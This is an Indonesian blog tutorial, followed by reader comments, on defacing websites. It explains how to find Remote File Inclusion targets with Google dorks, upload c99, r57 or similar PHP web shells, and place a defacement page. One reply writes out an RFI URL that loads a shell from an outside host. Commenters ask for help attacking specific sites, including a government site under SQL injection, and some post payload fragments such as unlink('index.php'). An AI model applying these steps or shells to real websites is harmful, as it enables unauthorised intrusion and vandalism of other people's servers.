Deface Website
Hi semuanya, kembali lagi dengan saya. Kali ini mau berbagi bagaimana cara Deface Website, karena yang request Cara Deface Website ini banyak sekali, bejibun masuk ke email saya. Akhirnya saya membuat artikel ini untuk memenuhi peremintaan kalian semua, let’s DEFACE WEBSITE – DEFACING WEBSITE..
Okelah kalau begitu semuanya, langsung lanjut ajah, skenarionya sebagai berikut:
- Anda sudah memiliki target website, kalau masih belum silakan cari di google melalui google dork yang anda punya atau bisa melihat Google Dork Remote File Inclusion – Webapps di www.exploit-db.com sampai Anda berhasil mendapatkan Target Website.
- Setelah mendapatkan target
website, silakan upload SHELL INJECT anda, kebetulan saya menggunakan
tools sendiri “File Manager Binus Hacker”
(Maaf: tidak untuk dipublikasikan) Anda bisa menggunakan r57shell / c99 shell / lainnya. Toolsnya bisa di download disini untuk rshell / c99: Download Shell Injection - Setelah anda mengupload Shell Injection, siapkan halaman “DEFACEMENT PAGE“, kebetulan saya menamainya dengan”HACKED.html“
- Setelah itu silakan kunjungi website target anda yang sudah di Deface.
Penjelasannya detail & langkah-langkahnya:
1.
Silakan cari target di google, misalnya: “inurl:page.php?xxx=” atau
“intitle: Google Dork” (Kumpulan google dork banyak tersedia di google,
silakan di search aja) atau anda bisa melihat list Google Dork Di
www.exploit-db.com , kemudian inject target website tersebut. Nah,
kebetulan saya mendapatkan target dibawah & kemudian melakukan
aktifitas shell injection, berikut gambarnya:

2. Langkah selanjutnya, saya melakukan upload fmbh.php (File Manager Binus Hacker), Anda bisa menggunakan Rshell / C99 untuk di upload ke website target tersebut. Directory yang saya pakai di webtarget adalah /vservers/silentcat/htdocs/includes/. Jadi ketika saya membuka shell di target menjadi: http://www.target.com/includes/fmbh.php

3. Setelah itu kita siapkan file halaman defacement: “HACKED.html”

Kemudian kita save menjadi: “HACKED.html”

4. Upload “HACKED.html” ke website target tadi, saya melakukan upload di /vservers/silentcat/htdocs/ artinya saya berada di lingkungan home directory.

Upload file HACKED.html, dari local computer yang anda simpan tadi.

Sehingga akan tampak hasil upload file “HACKED.html” sebagai berikut:

Dikarenakan permissionnya “600” (rw——-), artinya hanya Owner saja yang bisa melakukan “read & write” di file tersebut, kita harus merubah permissionnya menjadi “777″ / “755″, kalau 777 artinya semuanya memiliki akses “read, write & execute”, sedangkan saya hanya memakai “755″ biar bisa di baca & eksekusi saja:

5. Jika sudah selesai, maka lihat hasil DEFACE di: “http://www.target.com/hacked.html” , berikut hasil tampilannya:

Nah, sudah selesai.. Cukup mudah melakukan deface website, silakan lakukan eksperimen yang lebih banyak lagi.
Enjoy & Eat It!
Salam Hangat Buat BinusHacker Family (Lama Kita Tak Bersua, Ayo Ngumpul Lagi!)
Silakan jalan-jalan ke website saya: www.utuhwibowo.com
Silakan Follow Twitter Saya:













Salam Kenal, saya baru-baru ini tertipu melalui situs toko online. saya takutnya ada korban selanjutnya. mohon untuk di hack atau di bumi hanguskan web tersebut. untuk situs yang bersangkutan kita bisa komunikasi via e-mail gan.
bang, ana lagi perlu untuk software mengembalikan file & folder khususnya di CD atau CD RW.
saya tunggu balasannya…
thank’s ya
gan gimna cara ngbil fb ya fb saya kemarn di heck org gan dimna cara ngbalikin ya tolong gan,,,
kasitau gan gimna cara ya…?????
Emang gak ada matinya nih SUHU Utuh.
Gon si.. Gon si.. Suhu
wah,ga di jelasin nih mas cara ngupload shellnya ke web?
klo pake cara di atas “exploreid=alamat shell kita” kayaknya ga bisa deh mas
Untuk upload shell sangat mudah, kebanykan sudah di sediakan dari tools injection kita sendiri,
Nah untuk yang private shell ini jarang ada.
Silakan dari shell inject, Cari pilihan: BROWSE -> UPLOAD
hlow,.slm knal mas utuh.,
sy mo numpang tny,,ni website dah sy cba pke cra2 dlm sql inject buat cari nama tabel/nmor “ajaib”ny tp koq ttap blm bsa y.,,
bs tlg bantu gs mas??
sy bru mocoba aj ni,,skedar blajar2 mas..hehe.,.,
ni alamat webnya : http://www.sikkakab.go.id/index.php?hal=tampilbktm&offset=300
mhon pncerahan n penerangannya y mas.,
trmksih byk,.,
gan,penjelasan 1 dan 2 itu gimana,kurang paham saya,cara ngupload ke shell inject nya juga gimana tuh,trus donlot an rshell / c99 nya emang berbentuk text ya,tolong lebih rinci dong gan,kirim ke email ya..please,saya lagi belajar deface pusing,smw infonya ga ada yang jelas,dah saya otak atik malah pusing sendiri,nah di forum ini udah lumayan ngejelasin tapi juga masi rada bingung gan,trims gan…
Salam,
google dork itu apa ya ga dah nyari artinya di google ga ketemu maklum masih nubi
ajarin cara deface yg manual tapi yg sederhana donk ga thanks
shell kaya c99 itu ngejalaninnya harus di upload dulu ya ?
jadi kita ngejalaninnya lewat internet?
kalo iya share tempat hostingnya donk,soalnya saya upload di ripway akunnya di suspend mulu setiap saya mau ngejalanin shell nya,,,
terimakasih sebelumnya,,
mas ini tools wat upload shell nya mana ya??koq yg ada cma file php nya aja tapi tools wat uploadnya ga ada…thx be4
steve: silakan shellnya dicari bisa menggunakan C99 / RShell.
itu file phpnya di upload kan kk?
tapi di upload dmn ya?
soalnya saya udah cobla upload di beberapa free hosting gk mau kebuka malah ngedownload lagi,,,,
@ Steve : klo mau upload shell musti nyari web victim dulu, trus di inject, upload dah shell/backdoornya…
@Iwan: Untuk php injector backdoor di upload di website target, untuk pencarinya bisa dari website lain.
Jadi bisa seperti ini URL nya dari web target:
http://www.web-taarget-anda.com/page.php?exploreid=http://www.web-tempat-menyimpan-shell-inject.com/nama-folder-injector/c99.txt?
He He He, Maksud Mas itu “inurl:modules.php?name=forums” Yaaa… ???????
nah ini gan yang selalu bikin ane bingung.saat shel injection…
cara buat inject script ke web target itu dari mana???
ane bener-bener g ngerti.
dah cari tutor, bukannya ngerti tapi malah tambah ruwet.
Mohon pencerahannya…
harusnya di jelasin bang klo bug nya RFI,
sebab dari bug itu apa dan bagaimana cara patchnya… setidaknya biar pembaca yang lain tidak bingung.. masak langsung pakai google dork dan paste exploit.. ^.^
maaf saya hanya kasih saran buat menambahkan aja…
@hakz: Thanks atas masukannya bro, i miss it! < - Saya suka dengan orang yang selalu memberikan masukan untuk menyempurnakan artikel.
Saya tambahin dulu penjelasannya..
Jempol buat anda..
Terima kasih Suhu Utuh.
Saya sangat suka membaca artikel dari Anda.
Selalu sangat bermanfaat bagi pengetahuan saya.
Terus bikin artikel ya mas, saya tunggu
cocok, ini artikel yang gwe cari.
ketemu juga di binushacker.
hehehe
Yang di exploit DB itu Google Hacking DataBase bukan?
Jadi yang kita cari yang Remote File ya di exploit-db ya.
Terima kasih pencerahannya master, saya coba dulu ke TKP.
window.alert(“hehehehehehehe”);
zzzzzzzzzzzzzz
i want to be hacker.,., but i dont have tool for hacker.,.
aunt binus pliss give me some tool for hack you
hahahahaha
sama2 bang utuh…
buka web saya
kk itu injector.txt yag kk pake isinya apa soalnya saya pake c99.txt di situ keluar tulisan you has entered invalid character,,,,
mohon pencerahannya,,,
oia satu lagi kk,itu tempat nyimpannya harus online atau di database buatan sendiri seperti phptriad juga bisa,,,,?
maaaaf ya kk saya banyak nanya,bis newbie bgt nih kk,,,,hehehe:D
(numpang promo blog saya…) penjelasan tentang hacking, cracking, tips and trik..bisa kalian liat juga disini http://vjpith.blogspot.com
Waw… gara2 lupa update ternyata Websiteku di hacking juga hahaha makasih buat teman2 dari Malang Hacker
viva Hacker Indonesia 
NB: utuh apa kabar loe?
@Fadlie: Wah, kabar baik fren. Lama gak bersua
Salam Kenal, Trima ksh atas Info Dan Tutorialnya , Mudah2an ini bisa menjadi antisipasi buat kami sehingga bisa terhindar dari hacker2 lainnya
kak, kalo mau hack website itu harus download Shell Injection dulu ya?
mohon bantuannya ya
mass bantuin donk aqu di deface nih http://teknologi.orgfree.com/ and http://kumpul-forum.ueuo.com/ bisa gak mas tolong donk
gw udah download shell injection ternyata itu file php nah sekarang cara upload file php itu ke web server target gimana ya?
Hmm.. bsk nyoba praktekin ah hehehehe
gan ini gimana sih cara upload shell nya ? yang di dwnload itu .php doang gk ada uploader nya
@Afian: Pada r57 / c99 semua ada fasilitas upload localfile, silakan ditelusuri lebih dalam lagi.
@Falcon: Silakan cari vulnerability di google, kemudian cari yang Remote File Inclusion.
@L: Tidak harus download shell injection untuk deface, tergantung dari metode yang digunakan.
gan sorry mau nanya..deface itu kan buat ngerubah website orang ya?tapi kalo [http://www.target.com/hacked.html] berarti kita bikin sub website dari http://www.target.com donk?
satu lagi gimana caranya agar kalo orang lain ketik http://www.target.com langsung halaman yyg kita deface tadi?
bang..
tau cara memperbesar size usb…??
Bang, saya kan uda dapat C99.php nya. Trus gimana buat Upload ke Servernya, kita kan ga bisa sembarangan langsung upload tuh file ke direktori target. Mohon pencerahannya.. makasih
kk tolong beri langkah-langkah yang lebih rinci lagi dong ke email saya,,maklum lagi mau belajar soal yang beginian nh…
makasih sebelumnya…
GAn mohon maaf ni sebelumnya, ane masih kurang paham ni ma tutorial di atas, bisa kasih tw lebih detailnya gak di email saya…..
cara uploadnya gimana gan??????
kok gak bisa d download shell nya?
coba dulu gan…
thx for info n tutorial’ny…
Masih bingung nih pak untuk newbie hehehe
unlink(“index.php”)
salam, bro klo ingin punya notepad hacked.HTML toolx paan ya?apa jadi satu bunndle pack? matur tengkyu sory..baru belajar,hehe..
@Phenom6492 : sudah dijawab di forum Binus Hacker
untuk upload shell kita bisa mencari fungsi uploader, nah untuk ini kita musti jeli mencari dimana uploader berada dan tidak semua uplader dalam situs bisa untuk mengupload shell
kk kalo bisa buat VIDEOnya juga donk
mas,, jujur bgt nii saya udah coba 4 jam dan ga ngerti + failed step 1 dan ke 2 ,(msh awam)hehe

ni link yang saya dapt dari http://www.exploit-db.com ….. http://www.exploit-db.com/exploits/17358/
saya udh download c99 n r57
dan saya udah bikin halaman defacement nya (niat bgt blajar ini)
tp walhasil,, saya gatau harus diapain, krn stuck di step 1 n ke 2.
udh googling cara deface di web ato blog lain (x aja ada yg lebih bs dimengerti kaum awam) tp kebanyakan fake dan pake app ga jelas.(tkt virus)
masukan mas, tlng disederhanakan lagi dn lebih detail,,(bukan males usaha tp beneran ga ngerti)
karna mungkin kalo deface udah ngerti kita para nubie bs explore sendiri.
maaf ngerepotin,, tp saya tertarik bgt dengn ini..thx b4 n after,,
Bang gue ngin sekali bergabung dengan HACKING, mungkin bisa memberi solusi bang ma gue? Karena gue ngin jadi orang yang mampu dalam bidang tekhnoligi karena cita-cita gue ngin jadi HACKING semenjak kecil. Sebelumnya Makasih Bang!!
kerenzzzz
gmn gan kalo yang type asp…
kok susah banget ya???
Mas, kasih dong yg lebih jelas lagi caranya. Masa gak dikasih tau cara menginjeksi ke webnya !!!!!!!
gak iya nee SHELL INJECTION nya , gak aada
silakan yang matu tau cara uplad shell untuk merujuk kemari
http://www.youtube.com/results?search_query=shell+upload&aq=f
Sama seperti komen pertama (sdr Agung). Saya juga pernah tertipu oleh salah satu situs money game.
Ingin sekali rasanya meng-crack situs tersebut. Selain karena kesal, juga supaya orang lain tidak kena tipu lagi.
Kalo bisa dibantu, atau diberi tahu tutorialnya. Sekedar info, saya pernah belajar sedikit dan nemu kalo situsnya basis linux dan server apache. Katanya sih sulit ditembus, tapi bisa gak ya?
Mungkin nanti kita bisa lanjutkan via email. thanks
@wong : yang dimaksud sulit ditembus adalah ketika shell exec disabled
kalo enambed gag masalah
kk bagi toolsnya dong yang untuk deface, , ,
ak sneng dengan forum nie klo ada team hackernya ak mau ikut, , ,
butuh banyak tuntunan dari master2, ,
hidup hacker Indonesia, , ,
Shell-nya di localroot.net gk bsa di download gan.. Account Suspended
gan kenpa link di atas g mau di download y? Download Shell Injection
bgus gan artikelnya
mantap gan..cuma belum berani nyoba..mau lebih dalam dulu belajarnya….
gan tolong diperbaiki link downloadnya ??
kk cara ulpload shellnya gmn ?? ( maklum newbie)
@UtuH pada penjelasan no1 saya kurang jelas klw boleh tau boleh di perjelasin gk dari masing2 penjelasan yang udah ada
tolong dipots penjelasan nya mas
mungkin itu saja yang bisa saya sampaikan terima kasih
@UtuH
Apa bisa d perjelas untuk langkah-langkah no 1 & 2
Terimakasih…